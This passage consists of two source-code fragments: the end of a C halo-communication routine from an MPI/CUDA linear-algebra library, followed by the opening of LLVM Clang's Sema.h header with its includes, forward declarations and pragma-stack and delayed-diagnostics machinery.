GHOST_CALL_GOTO(ghost_malloc((void **)&comm->tmprecv_mem,vec->traits.ncols*vec->elSize*comm->acc_wishes),err,ret);
for (from_PE=0; from_PE<nprocs; from_PE++){
comm->tmprecv[from_PE] = &comm->tmprecv_mem[comm->wishptr[from_PE]*vec->traits.ncols*vec->elSize];
}
if (vec->traits.location & GHOST_LOCATION_DEVICE) {
GHOST_INSTR_START("hostAlloc")
GHOST_CALL_GOTO(ghost_cu_malloc_pinned((void **)&comm->work,(size_t)vec->traits.ncols*comm->acc_dues*vec->elSize),err,ret);
GHOST_INSTR_STOP("hostAlloc")
GHOST_INSTR_START("deviceAlloc")
GHOST_CALL_GOTO(ghost_cu_malloc(&comm->cu_work,vec->traits.ncols*comm->acc_dues*vec->elSize),err,ret);
GHOST_INSTR_STOP("deviceAlloc")
} else {
GHOST_CALL_GOTO(ghost_malloc((void **)&comm->work,(size_t)vec->traits.ncols*comm->acc_dues*vec->elSize),err,ret);
}
}
}
if (ctx->col_map->loc_perm) {
#ifdef GHOST_HAVE_CUDA
if (vec->traits.location & GHOST_LOCATION_DEVICE) {
ghost_densemat_cu_cm_communicationassembly(comm->cu_work,comm->dueptr,comm->acc_dues,vec,ctx,ctx->col_map->cu_loc_perm);
} else
#endif
if (vec->traits.location & GHOST_LOCATION_HOST) {
ghost_gidx c;
for (partner = 0; partner<ctx->nduepartners; partner++) {
to_PE = ctx->duepartners[partner];
#pragma omp parallel for private(c)
for (i=0; i<ctx->dues[to_PE]; i++){
for (c=0; c<vec->traits.ncols; c++) {
memcpy(comm->work + (c*ctx->dues[to_PE]+comm->dueptr[to_PE]*vec->traits.ncols+i)*vec->elSize,
DENSEMAT_VALPTR(vec,ctx->col_map->loc_perm[ctx->duelist[to_PE][i]],c),vec->elSize);//change to colPerm
}
}
}
}
} else {
#ifdef GHOST_HAVE_CUDA
if (vec->traits.location & GHOST_LOCATION_DEVICE) {
ghost_densemat_cu_cm_communicationassembly(comm->cu_work,comm->dueptr,comm->acc_dues,vec,ctx,NULL);
} else
#endif
if (vec->traits.location & GHOST_LOCATION_HOST) {
ghost_gidx c;
for (partner = 0; partner<ctx->nduepartners; partner++) {
to_PE = ctx->duepartners[partner];
#pragma omp parallel for private(c)
for (i=0; i<ctx->dues[to_PE]; i++){
for (c=0; c<vec->traits.ncols; c++) {
memcpy(comm->work + (c*ctx->dues[to_PE]+comm->dueptr[to_PE]*vec->traits.ncols+i)*vec->elSize,
DENSEMAT_VALPTR(vec,ctx->duelist[to_PE][i],c),vec->elSize);
}
}
}
}
}
#ifdef GHOST_HAVE_CUDA
if (vec->traits.location & GHOST_LOCATION_DEVICE) {
GHOST_INSTR_START("downloadcomm->work");
#ifdef GHOST_TRACK_DATATRANSFERS
ghost_datatransfer_register("spmv_halo",GHOST_DATATRANSFER_IN,GHOST_DATATRANSFER_RANK_GPU,vec->traits.ncols*comm->acc_dues*vec->elSize);
#endif
#ifdef GHOST_HAVE_GPUDIRECT
if (vec->traits.ncols > 1)
#endif
{
ghost_cu_download(comm->work,comm->cu_work,vec->traits.ncols*comm->acc_dues*vec->elSize);
}
GHOST_INSTR_STOP("downloadcomm->work");
}
#endif
goto out;
err:
out:
GHOST_FUNC_EXIT(GHOST_FUNCTYPE_COMMUNICATION);
return ret;
#else
UNUSED(vec);
UNUSED(comm);
UNUSED(ctx);
return GHOST_ERR_NOT_IMPLEMENTED;
#endif
}
ghost_error ghost_densemat_cm_halocommFinalize(ghost_densemat *vec, ghost_context *ctx, ghost_densemat_halo_comm *comm)
{
#ifdef GHOST_HAVE_MPI
GHOST_FUNC_ENTER(GHOST_FUNCTYPE_COMMUNICATION);
ghost_error ret = GHOST_SUCCESS;
int nprocs;
int i, from_PE, partner;
GHOST_CALL_GOTO(ghost_nrank(&nprocs, ctx->mpicomm),err,ret);
ghost_densemat_halocommFinalize_common(comm);
if (vec->traits.location == GHOST_LOCATION_HOST) {
GHOST_INSTR_START("Assemble row-major view");
for (partner=0; partner<ctx->nwishpartners; partner++){
from_PE = ctx->wishpartners[partner];
/* if( (ctx->perm_local) && (ctx->flags & GHOST_PERM_NO_DISTINCTION) ){
//copy to permuted position
for (i=0; i<ctx->wishes[from_PE]; i++){
for (c=0; c<vec->traits.ncols; c++) {
memcpy(DENSEMAT_VALPTR(vec,ctx->perm_local->colPerm[ctx->hput_pos[from_PE]+i],c),
&comm->tmprecv[from_PE][(c*ctx->wishes[from_PE]+i)*vec->elSize],vec->elSize);
}
}
} else { */
for (i=0; i<vec->traits.ncols; i++){
memcpy(DENSEMAT_VALPTR(vec,ctx->hput_pos[from_PE],i),&comm->tmprecv[from_PE][(i*ctx->wishes[from_PE])*vec->elSize],vec->elSize*ctx->wishes[from_PE]);
// }
}
}
GHOST_INSTR_STOP("Assemble row-major view");
}
#ifdef GHOST_HAVE_CUDA
GHOST_INSTR_START("upload")
if (vec->traits.location & GHOST_LOCATION_DEVICE) {
#ifdef GHOST_TRACK_DATATRANSFERS
ghost_datatransfer_register("spmv_halo",GHOST_DATATRANSFER_OUT,GHOST_DATATRANSFER_RANK_GPU,ctx->col_map->nhalo*vec->traits.ncols*vec->elSize);
#endif
#ifdef GHOST_HAVE_GPUDIRECT
if (vec->traits.ncols > 1)
#endif
{
for (from_PE=0; from_PE<nprocs; from_PE++){
ghost_cu_upload2d(DENSEMAT_CUVALPTR(vec,ctx->hput_pos[from_PE],0),vec->stride*vec->elSize,comm->tmprecv[from_PE],ctx->wishes[from_PE]*vec->elSize,ctx->wishes[from_PE]*vec->elSize,vec->traits.ncols);
}
}
}
GHOST_INSTR_STOP("upload");
#endif
if (vec->traits.location & GHOST_LOCATION_DEVICE) {
GHOST_CALL_GOTO(ghost_cu_free(comm->cu_work),err,ret); comm->cu_work = NULL;
GHOST_CALL_GOTO(ghost_cu_free_host(comm->work),err,ret); comm->work = NULL;
} else {
free(comm->work); comm->work = NULL;
}
free(comm->tmprecv_mem); comm->tmprecv_mem = NULL;
free(comm->tmprecv); comm->tmprecv = NULL;
free(comm->request); comm->request = NULL;
free(comm->status); comm->status = NULL;
free(comm->dueptr); comm->dueptr = NULL;
free(comm->wishptr); comm->wishptr = NULL;
goto out;
err:
out:
GHOST_FUNC_EXIT(GHOST_FUNCTYPE_COMMUNICATION);
return ret;
#else
UNUSED(vec);
UNUSED(comm);
UNUSED(ctx);
return GHOST_ERR_NOT_IMPLEMENTED;
#endif
}
|
Sema.h | //===--- Sema.h - Semantic Analysis & AST Building --------------*- C++ -*-===//
//
// Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
// See https://llvm.org/LICENSE.txt for license information.
// SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
//
//===----------------------------------------------------------------------===//
//
// This file defines the Sema class, which performs semantic analysis and
// builds ASTs.
//
//===----------------------------------------------------------------------===//
#ifndef LLVM_CLANG_SEMA_SEMA_H
#define LLVM_CLANG_SEMA_SEMA_H
#include "clang/AST/ASTConcept.h"
#include "clang/AST/Attr.h"
#include "clang/AST/Availability.h"
#include "clang/AST/ComparisonCategories.h"
#include "clang/AST/DeclTemplate.h"
#include "clang/AST/DeclarationName.h"
#include "clang/AST/Expr.h"
#include "clang/AST/ExprCXX.h"
#include "clang/AST/ExprObjC.h"
#include "clang/AST/ExternalASTSource.h"
#include "clang/AST/LocInfoType.h"
#include "clang/AST/MangleNumberingContext.h"
#include "clang/AST/NSAPI.h"
#include "clang/AST/PrettyPrinter.h"
#include "clang/AST/StmtCXX.h"
#include "clang/AST/TypeLoc.h"
#include "clang/APINotes/APINotesManager.h"
#include "clang/AST/TypeOrdering.h"
#include "clang/Basic/BitmaskEnum.h"
#include "clang/Basic/ExpressionTraits.h"
#include "clang/Basic/Module.h"
#include "clang/Basic/OpenMPKinds.h"
#include "clang/Basic/PragmaKinds.h"
#include "clang/Basic/Specifiers.h"
#include "clang/Basic/TemplateKinds.h"
#include "clang/Basic/TypeTraits.h"
#include "clang/Sema/AnalysisBasedWarnings.h"
#include "clang/Sema/CleanupInfo.h"
#include "clang/Sema/DeclSpec.h"
#include "clang/Sema/ExternalSemaSource.h"
#include "clang/Sema/IdentifierResolver.h"
#include "clang/Sema/ObjCMethodList.h"
#include "clang/Sema/Ownership.h"
#include "clang/Sema/Scope.h"
#include "clang/Sema/TypoCorrection.h"
#include "clang/Sema/Weak.h"
#include "llvm/ADT/ArrayRef.h"
#include "llvm/ADT/Optional.h"
#include "llvm/ADT/SetVector.h"
#include "llvm/ADT/SmallBitVector.h"
#include "llvm/ADT/SmallPtrSet.h"
#include "llvm/ADT/SmallVector.h"
#include "llvm/ADT/TinyPtrVector.h"
#include "llvm/Frontend/OpenMP/OMPConstants.h"
#include <deque>
#include <functional>
#include <memory>
#include <string>
#include <tuple>
#include <vector>
namespace llvm {
class APSInt;
template <typename ValueT> struct DenseMapInfo;
template <typename ValueT, typename ValueInfoT> class DenseSet;
class SmallBitVector;
struct InlineAsmIdentifierInfo;
}
namespace clang {
class ADLResult;
class ASTConsumer;
class ASTContext;
class ASTMutationListener;
class ASTReader;
class ASTWriter;
class ArrayType;
class ParsedAttr;
class BindingDecl;
class BlockDecl;
class CapturedDecl;
class CXXBasePath;
class CXXBasePaths;
class CXXBindTemporaryExpr;
typedef SmallVector<CXXBaseSpecifier*, 4> CXXCastPath;
class CXXConstructorDecl;
class CXXConversionDecl;
class CXXDeleteExpr;
class CXXDestructorDecl;
class CXXFieldCollector;
class CXXMemberCallExpr;
class CXXMethodDecl;
class CXXScopeSpec;
class CXXTemporary;
class CXXTryStmt;
class CallExpr;
class ClassTemplateDecl;
class ClassTemplatePartialSpecializationDecl;
class ClassTemplateSpecializationDecl;
class VarTemplatePartialSpecializationDecl;
class CodeCompleteConsumer;
class CodeCompletionAllocator;
class CodeCompletionTUInfo;
class CodeCompletionResult;
class CoroutineBodyStmt;
class Decl;
class DeclAccessPair;
class DeclContext;
class DeclRefExpr;
class DeclaratorDecl;
class DeducedTemplateArgument;
class DependentDiagnostic;
class DesignatedInitExpr;
class Designation;
class EnableIfAttr;
class EnumConstantDecl;
class Expr;
class ExtVectorType;
class FormatAttr;
class FriendDecl;
class FunctionDecl;
class FunctionProtoType;
class FunctionTemplateDecl;
class ImplicitConversionSequence;
typedef MutableArrayRef<ImplicitConversionSequence> ConversionSequenceList;
class InitListExpr;
class InitializationKind;
class InitializationSequence;
class InitializedEntity;
class IntegerLiteral;
class LabelStmt;
class LambdaExpr;
class LangOptions;
class LocalInstantiationScope;
class LookupResult;
class MacroInfo;
typedef ArrayRef<std::pair<IdentifierInfo *, SourceLocation>> ModuleIdPath;
class ModuleLoader;
class MultiLevelTemplateArgumentList;
class NamedDecl;
class ObjCCategoryDecl;
class ObjCCategoryImplDecl;
class ObjCCompatibleAliasDecl;
class ObjCContainerDecl;
class ObjCImplDecl;
class ObjCImplementationDecl;
class ObjCInterfaceDecl;
class ObjCIvarDecl;
template <class T> class ObjCList;
class ObjCMessageExpr;
class ObjCMethodDecl;
class ObjCPropertyDecl;
class ObjCProtocolDecl;
class OMPThreadPrivateDecl;
class OMPRequiresDecl;
class OMPDeclareReductionDecl;
class OMPDeclareSimdDecl;
class OMPClause;
struct OMPVarListLocTy;
struct OverloadCandidate;
enum class OverloadCandidateParamOrder : char;
enum OverloadCandidateRewriteKind : unsigned;
class OverloadCandidateSet;
class OverloadExpr;
class ParenListExpr;
class ParmVarDecl;
class Preprocessor;
class PseudoDestructorTypeStorage;
class PseudoObjectExpr;
class QualType;
class StandardConversionSequence;
class Stmt;
class StringLiteral;
class SwitchStmt;
class TemplateArgument;
class TemplateArgumentList;
class TemplateArgumentLoc;
class TemplateDecl;
class TemplateInstantiationCallback;
class TemplateParameterList;
class TemplatePartialOrderingContext;
class TemplateTemplateParmDecl;
class Token;
class TypeAliasDecl;
class TypedefDecl;
class TypedefNameDecl;
class TypeLoc;
class TypoCorrectionConsumer;
class UnqualifiedId;
class UnresolvedLookupExpr;
class UnresolvedMemberExpr;
class UnresolvedSetImpl;
class UnresolvedSetIterator;
class UsingDecl;
class UsingShadowDecl;
class ValueDecl;
class VarDecl;
class VarTemplateSpecializationDecl;
class VisibilityAttr;
class VisibleDeclConsumer;
class IndirectFieldDecl;
struct DeductionFailureInfo;
class TemplateSpecCandidateSet;
namespace sema {
class AccessedEntity;
class BlockScopeInfo;
class Capture;
class CapturedRegionScopeInfo;
class CapturingScopeInfo;
class CompoundScopeInfo;
class DelayedDiagnostic;
class DelayedDiagnosticPool;
class FunctionScopeInfo;
class LambdaScopeInfo;
class PossiblyUnreachableDiag;
class SemaPPCallbacks;
class TemplateDeductionInfo;
}
namespace threadSafety {
class BeforeSet;
void threadSafetyCleanup(BeforeSet* Cache);
}
// FIXME: No way to easily map from TemplateTypeParmTypes to
// TemplateTypeParmDecls, so we have this horrible PointerUnion.
typedef std::pair<llvm::PointerUnion<const TemplateTypeParmType*, NamedDecl*>,
SourceLocation> UnexpandedParameterPack;
/// Describes whether we've seen any nullability information for the given
/// file.
struct FileNullability {
/// The first pointer declarator (of any pointer kind) in the file that does
/// not have a corresponding nullability annotation.
SourceLocation PointerLoc;
/// The end location for the first pointer declarator in the file. Used for
/// placing fix-its.
SourceLocation PointerEndLoc;
/// Which kind of pointer declarator we saw.
uint8_t PointerKind;
/// Whether we saw any type nullability annotations in the given file.
bool SawTypeNullability = false;
};
/// A mapping from file IDs to a record of whether we've seen nullability
/// information in that file.
class FileNullabilityMap {
/// A mapping from file IDs to the nullability information for each file ID.
llvm::DenseMap<FileID, FileNullability> Map;
/// A single-element cache based on the file ID.
struct {
FileID File;
FileNullability Nullability;
} Cache;
public:
FileNullability &operator[](FileID file) {
// Check the single-element cache.
if (file == Cache.File)
return Cache.Nullability;
// It's not in the single-element cache; flush the cache if we have one.
if (!Cache.File.isInvalid()) {
Map[Cache.File] = Cache.Nullability;
}
// Pull this entry into the cache.
Cache.File = file;
Cache.Nullability = Map[file];
return Cache.Nullability;
}
};
/// Keeps track of expected type during expression parsing. The type is tied to
/// a particular token, all functions that update or consume the type take a
/// start location of the token they are looking at as a parameter. This allows
/// to avoid updating the type on hot paths in the parser.
class PreferredTypeBuilder {
public:
PreferredTypeBuilder() = default;
explicit PreferredTypeBuilder(QualType Type) : Type(Type) {}
void enterCondition(Sema &S, SourceLocation Tok);
void enterReturn(Sema &S, SourceLocation Tok);
void enterVariableInit(SourceLocation Tok, Decl *D);
/// Computing a type for the function argument may require running
/// overloading, so we postpone its computation until it is actually needed.
///
/// Clients should be very careful when using this funciton, as it stores a
/// function_ref, clients should make sure all calls to get() with the same
/// location happen while function_ref is alive.
void enterFunctionArgument(SourceLocation Tok,
llvm::function_ref<QualType()> ComputeType);
void enterParenExpr(SourceLocation Tok, SourceLocation LParLoc);
void enterUnary(Sema &S, SourceLocation Tok, tok::TokenKind OpKind,
SourceLocation OpLoc);
void enterBinary(Sema &S, SourceLocation Tok, Expr *LHS, tok::TokenKind Op);
void enterMemAccess(Sema &S, SourceLocation Tok, Expr *Base);
void enterSubscript(Sema &S, SourceLocation Tok, Expr *LHS);
/// Handles all type casts, including C-style cast, C++ casts, etc.
void enterTypeCast(SourceLocation Tok, QualType CastType);
QualType get(SourceLocation Tok) const {
if (Tok != ExpectedLoc)
return QualType();
if (!Type.isNull())
return Type;
if (ComputeType)
return ComputeType();
return QualType();
}
private:
/// Start position of a token for which we store expected type.
SourceLocation ExpectedLoc;
/// Expected type for a token starting at ExpectedLoc.
QualType Type;
/// A function to compute expected type at ExpectedLoc. It is only considered
/// if Type is null.
llvm::function_ref<QualType()> ComputeType;
};
/// Sema - This implements semantic analysis and AST building for C.
class Sema final {
Sema(const Sema &) = delete;
void operator=(const Sema &) = delete;
/// A key method to reduce duplicate debug info from Sema.
virtual void anchor();
///Source of additional semantic information.
ExternalSemaSource *ExternalSource;
///Whether Sema has generated a multiplexer and has to delete it.
bool isMultiplexExternalSource;
static bool mightHaveNonExternalLinkage(const DeclaratorDecl *FD);
bool isVisibleSlow(const NamedDecl *D);
/// Determine whether two declarations should be linked together, given that
/// the old declaration might not be visible and the new declaration might
/// not have external linkage.
bool shouldLinkPossiblyHiddenDecl(const NamedDecl *Old,
const NamedDecl *New) {
if (isVisible(Old))
return true;
// See comment in below overload for why it's safe to compute the linkage
// of the new declaration here.
if (New->isExternallyDeclarable()) {
assert(Old->isExternallyDeclarable() &&
"should not have found a non-externally-declarable previous decl");
return true;
}
return false;
}
bool shouldLinkPossiblyHiddenDecl(LookupResult &Old, const NamedDecl *New);
void setupImplicitSpecialMemberType(CXXMethodDecl *SpecialMem,
QualType ResultTy,
ArrayRef<QualType> Args);
public:
typedef OpaquePtr<DeclGroupRef> DeclGroupPtrTy;
typedef OpaquePtr<TemplateName> TemplateTy;
typedef OpaquePtr<QualType> TypeTy;
OpenCLOptions OpenCLFeatures;
FPOptions FPFeatures;
const LangOptions &LangOpts;
Preprocessor &PP;
ASTContext &Context;
ASTConsumer &Consumer;
DiagnosticsEngine &Diags;
SourceManager &SourceMgr;
api_notes::APINotesManager APINotes;
/// Flag indicating whether or not to collect detailed statistics.
bool CollectStats;
/// Code-completion consumer.
CodeCompleteConsumer *CodeCompleter;
/// CurContext - This is the current declaration context of parsing.
DeclContext *CurContext;
/// Generally null except when we temporarily switch decl contexts,
/// like in \see ActOnObjCTemporaryExitContainerContext.
DeclContext *OriginalLexicalContext;
/// VAListTagName - The declaration name corresponding to __va_list_tag.
/// This is used as part of a hack to omit that class from ADL results.
DeclarationName VAListTagName;
bool MSStructPragmaOn; // True when \#pragma ms_struct on
/// Controls member pointer representation format under the MS ABI.
LangOptions::PragmaMSPointersToMembersKind
MSPointerToMemberRepresentationMethod;
/// Stack of active SEH __finally scopes. Can be empty.
SmallVector<Scope*, 2> CurrentSEHFinally;
/// Source location for newly created implicit MSInheritanceAttrs
SourceLocation ImplicitMSInheritanceAttrLoc;
/// Holds TypoExprs that are created from `createDelayedTypo`. This is used by
/// `TransformTypos` in order to keep track of any TypoExprs that are created
/// recursively during typo correction and wipe them away if the correction
/// fails.
llvm::SmallVector<TypoExpr *, 2> TypoExprs;
/// pragma clang section kind
enum PragmaClangSectionKind {
PCSK_Invalid = 0,
PCSK_BSS = 1,
PCSK_Data = 2,
PCSK_Rodata = 3,
PCSK_Text = 4,
PCSK_Relro = 5
};
enum PragmaClangSectionAction {
PCSA_Set = 0,
PCSA_Clear = 1
};
struct PragmaClangSection {
std::string SectionName;
bool Valid = false;
SourceLocation PragmaLocation;
void Act(SourceLocation PragmaLocation,
PragmaClangSectionAction Action,
StringLiteral* Name);
};
PragmaClangSection PragmaClangBSSSection;
PragmaClangSection PragmaClangDataSection;
PragmaClangSection PragmaClangRodataSection;
PragmaClangSection PragmaClangRelroSection;
PragmaClangSection PragmaClangTextSection;
enum PragmaMsStackAction {
PSK_Reset = 0x0, // #pragma ()
PSK_Set = 0x1, // #pragma (value)
PSK_Push = 0x2, // #pragma (push[, id])
PSK_Pop = 0x4, // #pragma (pop[, id])
PSK_Show = 0x8, // #pragma (show) -- only for "pack"!
PSK_Push_Set = PSK_Push | PSK_Set, // #pragma (push[, id], value)
PSK_Pop_Set = PSK_Pop | PSK_Set, // #pragma (pop[, id], value)
};
template<typename ValueType>
struct PragmaStack {
struct Slot {
llvm::StringRef StackSlotLabel;
ValueType Value;
SourceLocation PragmaLocation;
SourceLocation PragmaPushLocation;
Slot(llvm::StringRef StackSlotLabel, ValueType Value,
SourceLocation PragmaLocation, SourceLocation PragmaPushLocation)
: StackSlotLabel(StackSlotLabel), Value(Value),
PragmaLocation(PragmaLocation),
PragmaPushLocation(PragmaPushLocation) {}
};
void Act(SourceLocation PragmaLocation,
PragmaMsStackAction Action,
llvm::StringRef StackSlotLabel,
ValueType Value);
// MSVC seems to add artificial slots to #pragma stacks on entering a C++
// method body to restore the stacks on exit, so it works like this:
//
// struct S {
// #pragma <name>(push, InternalPragmaSlot, <current_pragma_value>)
// void Method {}
// #pragma <name>(pop, InternalPragmaSlot)
// };
//
// It works even with #pragma vtordisp, although MSVC doesn't support
// #pragma vtordisp(push [, id], n)
// syntax.
//
// Push / pop a named sentinel slot.
void SentinelAction(PragmaMsStackAction Action, StringRef Label) {
assert((Action == PSK_Push || Action == PSK_Pop) &&
"Can only push / pop #pragma stack sentinels!");
Act(CurrentPragmaLocation, Action, Label, CurrentValue);
}
// Constructors.
explicit PragmaStack(const ValueType &Default)
: DefaultValue(Default), CurrentValue(Default) {}
bool hasValue() const { return CurrentValue != DefaultValue; }
SmallVector<Slot, 2> Stack;
ValueType DefaultValue; // Value used for PSK_Reset action.
ValueType CurrentValue;
SourceLocation CurrentPragmaLocation;
};
// FIXME: We should serialize / deserialize these if they occur in a PCH (but
// we shouldn't do so if they're in a module).
/// Whether to insert vtordisps prior to virtual bases in the Microsoft
/// C++ ABI. Possible values are 0, 1, and 2, which mean:
///
/// 0: Suppress all vtordisps
/// 1: Insert vtordisps in the presence of vbase overrides and non-trivial
/// structors
/// 2: Always insert vtordisps to support RTTI on partially constructed
/// objects
PragmaStack<MSVtorDispMode> VtorDispStack;
// #pragma pack.
// Sentinel to represent when the stack is set to mac68k alignment.
static const unsigned kMac68kAlignmentSentinel = ~0U;
PragmaStack<unsigned> PackStack;
// The current #pragma pack values and locations at each #include.
struct PackIncludeState {
unsigned CurrentValue;
SourceLocation CurrentPragmaLocation;
bool HasNonDefaultValue, ShouldWarnOnInclude;
};
SmallVector<PackIncludeState, 8> PackIncludeStack;
// Segment #pragmas.
PragmaStack<StringLiteral *> DataSegStack;
PragmaStack<StringLiteral *> BSSSegStack;
PragmaStack<StringLiteral *> ConstSegStack;
PragmaStack<StringLiteral *> CodeSegStack;
// RAII object to push / pop sentinel slots for all MS #pragma stacks.
// Actions should be performed only if we enter / exit a C++ method body.
class PragmaStackSentinelRAII {
public:
PragmaStackSentinelRAII(Sema &S, StringRef SlotLabel, bool ShouldAct);
~PragmaStackSentinelRAII();
private:
Sema &S;
StringRef SlotLabel;
bool ShouldAct;
};
/// A mapping that describes the nullability we've seen in each header file.
FileNullabilityMap NullabilityMap;
/// Last section used with #pragma init_seg.
StringLiteral *CurInitSeg;
SourceLocation CurInitSegLoc;
/// VisContext - Manages the stack for \#pragma GCC visibility.
void *VisContext; // Really a "PragmaVisStack*"
/// This an attribute introduced by \#pragma clang attribute.
struct PragmaAttributeEntry {
SourceLocation Loc;
ParsedAttr *Attribute;
SmallVector<attr::SubjectMatchRule, 4> MatchRules;
bool IsUsed;
};
/// A push'd group of PragmaAttributeEntries.
struct PragmaAttributeGroup {
/// The location of the push attribute.
SourceLocation Loc;
/// The namespace of this push group.
const IdentifierInfo *Namespace;
SmallVector<PragmaAttributeEntry, 2> Entries;
};
SmallVector<PragmaAttributeGroup, 2> PragmaAttributeStack;
/// The declaration that is currently receiving an attribute from the
/// #pragma attribute stack.
const Decl *PragmaAttributeCurrentTargetDecl;
/// This represents the last location of a "#pragma clang optimize off"
/// directive if such a directive has not been closed by an "on" yet. If
/// optimizations are currently "on", this is set to an invalid location.
SourceLocation OptimizeOffPragmaLocation;
/// Flag indicating if Sema is building a recovery call expression.
///
/// This flag is used to avoid building recovery call expressions
/// if Sema is already doing so, which would cause infinite recursions.
bool IsBuildingRecoveryCallExpr;
/// Used to control the generation of ExprWithCleanups.
CleanupInfo Cleanup;
/// ExprCleanupObjects - This is the stack of objects requiring
/// cleanup that are created by the current full expression. The
/// element type here is ExprWithCleanups::Object.
SmallVector<BlockDecl*, 8> ExprCleanupObjects;
/// Store a set of either DeclRefExprs or MemberExprs that contain a reference
/// to a variable (constant) that may or may not be odr-used in this Expr, and
/// we won't know until all lvalue-to-rvalue and discarded value conversions
/// have been applied to all subexpressions of the enclosing full expression.
/// This is cleared at the end of each full expression.
using MaybeODRUseExprSet = llvm::SmallPtrSet<Expr *, 2>;
MaybeODRUseExprSet MaybeODRUseExprs;
std::unique_ptr<sema::FunctionScopeInfo> CachedFunctionScope;
/// Stack containing information about each of the nested
/// function, block, and method scopes that are currently active.
SmallVector<sema::FunctionScopeInfo *, 4> FunctionScopes;
typedef LazyVector<TypedefNameDecl *, ExternalSemaSource,
&ExternalSemaSource::ReadExtVectorDecls, 2, 2>
ExtVectorDeclsType;
/// ExtVectorDecls - This is a list all the extended vector types. This allows
/// us to associate a raw vector type with one of the ext_vector type names.
/// This is only necessary for issuing pretty diagnostics.
ExtVectorDeclsType ExtVectorDecls;
/// FieldCollector - Collects CXXFieldDecls during parsing of C++ classes.
std::unique_ptr<CXXFieldCollector> FieldCollector;
typedef llvm::SmallSetVector<NamedDecl *, 16> NamedDeclSetType;
/// Set containing all declared private fields that are not used.
NamedDeclSetType UnusedPrivateFields;
/// Set containing all typedefs that are likely unused.
llvm::SmallSetVector<const TypedefNameDecl *, 4>
UnusedLocalTypedefNameCandidates;
/// Delete-expressions to be analyzed at the end of translation unit
///
/// This list contains class members, and locations of delete-expressions
/// that could not be proven as to whether they mismatch with new-expression
/// used in initializer of the field.
typedef std::pair<SourceLocation, bool> DeleteExprLoc;
typedef llvm::SmallVector<DeleteExprLoc, 4> DeleteLocs;
llvm::MapVector<FieldDecl *, DeleteLocs> DeleteExprs;
typedef llvm::SmallPtrSet<const CXXRecordDecl*, 8> RecordDeclSetTy;
/// PureVirtualClassDiagSet - a set of class declarations which we have
/// emitted a list of pure virtual functions. Used to prevent emitting the
/// same list more than once.
std::unique_ptr<RecordDeclSetTy> PureVirtualClassDiagSet;
/// ParsingInitForAutoVars - a set of declarations with auto types for which
/// we are currently parsing the initializer.
llvm::SmallPtrSet<const Decl*, 4> ParsingInitForAutoVars;
/// Look for a locally scoped extern "C" declaration by the given name.
NamedDecl *findLocallyScopedExternCDecl(DeclarationName Name);
typedef LazyVector<VarDecl *, ExternalSemaSource,
&ExternalSemaSource::ReadTentativeDefinitions, 2, 2>
TentativeDefinitionsType;
/// All the tentative definitions encountered in the TU.
TentativeDefinitionsType TentativeDefinitions;
/// All the external declarations encoutered and used in the TU.
SmallVector<VarDecl *, 4> ExternalDeclarations;
typedef LazyVector<const DeclaratorDecl *, ExternalSemaSource,
&ExternalSemaSource::ReadUnusedFileScopedDecls, 2, 2>
UnusedFileScopedDeclsType;
/// The set of file scoped decls seen so far that have not been used
/// and must warn if not used. Only contains the first declaration.
UnusedFileScopedDeclsType UnusedFileScopedDecls;
typedef LazyVector<CXXConstructorDecl *, ExternalSemaSource,
&ExternalSemaSource::ReadDelegatingConstructors, 2, 2>
DelegatingCtorDeclsType;
/// All the delegating constructors seen so far in the file, used for
/// cycle detection at the end of the TU.
DelegatingCtorDeclsType DelegatingCtorDecls;
/// All the overriding functions seen during a class definition
/// that had their exception spec checks delayed, plus the overridden
/// function.
SmallVector<std::pair<const CXXMethodDecl*, const CXXMethodDecl*>, 2>
DelayedOverridingExceptionSpecChecks;
/// All the function redeclarations seen during a class definition that had
/// their exception spec checks delayed, plus the prior declaration they
/// should be checked against. Except during error recovery, the new decl
/// should always be a friend declaration, as that's the only valid way to
/// redeclare a special member before its class is complete.
SmallVector<std::pair<FunctionDecl*, FunctionDecl*>, 2>
DelayedEquivalentExceptionSpecChecks;
typedef llvm::MapVector<const FunctionDecl *,
std::unique_ptr<LateParsedTemplate>>
LateParsedTemplateMapT;
LateParsedTemplateMapT LateParsedTemplateMap;
/// Callback to the parser to parse templated functions when needed.
typedef void LateTemplateParserCB(void *P, LateParsedTemplate &LPT);
typedef void LateTemplateParserCleanupCB(void *P);
LateTemplateParserCB *LateTemplateParser;
LateTemplateParserCleanupCB *LateTemplateParserCleanup;
void *OpaqueParser;
void SetLateTemplateParser(LateTemplateParserCB *LTP,
LateTemplateParserCleanupCB *LTPCleanup,
void *P) {
LateTemplateParser = LTP;
LateTemplateParserCleanup = LTPCleanup;
OpaqueParser = P;
}
/// \brief Callback to the parser to parse a type expressed as a string.
std::function<TypeResult(StringRef, StringRef, SourceLocation)>
ParseTypeFromStringCallback;
class DelayedDiagnostics;
class DelayedDiagnosticsState {
sema::DelayedDiagnosticPool *SavedPool;
friend class Sema::DelayedDiagnostics;
};
typedef DelayedDiagnosticsState ParsingDeclState;
typedef DelayedDiagnosticsState ProcessingContextState;
/// A class which encapsulates the logic for delaying diagnostics
/// during parsing and other processing.
class DelayedDiagnostics {
/// The current pool of diagnostics into which delayed
/// diagnostics should go.
sema::DelayedDiagnosticPool *CurPool;
public:
DelayedDiagnostics() : CurPool(nullptr) {}
/// Adds a delayed diagnostic.
void add(const sema::DelayedDiagnostic &diag); // in DelayedDiagnostic.h
/// Determines whether diagnostics should be delayed.
bool shouldDelayDiagnostics() { return CurPool != nullptr; }
/// Returns the current delayed-diagnostics pool.
sema::DelayedDiagnosticPool *getCurrentPool() const {
return CurPool;
}
/// Enter a new scope. Access and deprecation diagnostics will be
/// collected in this pool.
DelayedDiagnosticsState push(sema::DelayedDiagnosticPool &pool) {
DelayedDiagnosticsState state;
state.SavedPool = CurPool;
CurPool = &pool;
return state;
}
/// Leave a delayed-diagnostic state that was previously pushed.
/// Do not emit any of the diagnostics. This is performed as part
/// of the bookkeeping of popping a pool "properly".
void popWithoutEmitting(DelayedDiagnosticsState state) {
CurPool = state.SavedPool;
}
/// Enter a new scope where access and deprecation diagnostics are
/// not delayed.
DelayedDiagnosticsState pushUndelayed() {
DelayedDiagnosticsState state;
state.SavedPool = CurPool;
CurPool = nullptr;
return state;
}
/// Undo a previous pushUndelayed().
void popUndelayed(DelayedDiagnosticsState state) {
assert(CurPool == nullptr);
CurPool = state.SavedPool;
}
} DelayedDiagnostics;
/// A RAII object to temporarily push a declaration context.
class ContextRAII {
private:
Sema &S;
DeclContext *SavedContext;
ProcessingContextState SavedContextState;
QualType SavedCXXThisTypeOverride;
